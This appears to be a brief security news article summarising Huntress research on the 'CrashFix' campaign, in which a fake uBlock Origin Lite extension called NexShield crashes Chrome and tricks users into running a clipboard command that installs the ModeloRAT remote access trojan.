Security researchers at Huntress have uncovered a new variant of the ClickFix attack, dubbed ‘CrashFix,’ that uses a malicious Chrome extension to crash users’ browsers and trick them into installing malware.
The campaign involves a fake browser extension called ‘NexShield,’ which impersonates the legitimate uBlock Origin Lite ad blocker. Once installed, the extension triggers a denial-of-service condition by repeatedly creating millions of Chrome runtime connections in an infinite loop, exhausting system resources and causing the browser to freeze or crash.
After the crash, victims are shown a fake security warning claiming issues have been detected. The message instructs users to open the Windows Run dialog and paste content from their clipboard to “fix” the problem. At this point, NexShield has already copied a malicious PowerShell command to the clipboard, masquerading as a repair action.
Executing the command launches the legitimate Windows utility Finger.exe and downloads a secondary payload that installs ModeloRAT, a Python-based remote access trojan. Notably, the malware only infects domain-joined systems, indicating a deliberate focus on corporate environments.
Huntress attributes the campaign to a threat actor dubbed ‘KongTuke,’ active since at least early 2025. The attackers delay malicious behavior to avoid suspicion, triggering browser crashes about an hour after installation and repeating them periodically.
ModeloRAT supports system reconnaissance, persistence, command execution, encrypted command-and-control (C&C) communications, and anti-analysis techniques. According to Huntress, the goal appears to be access to enterprise networks, Active Directory, and sensitive internal data.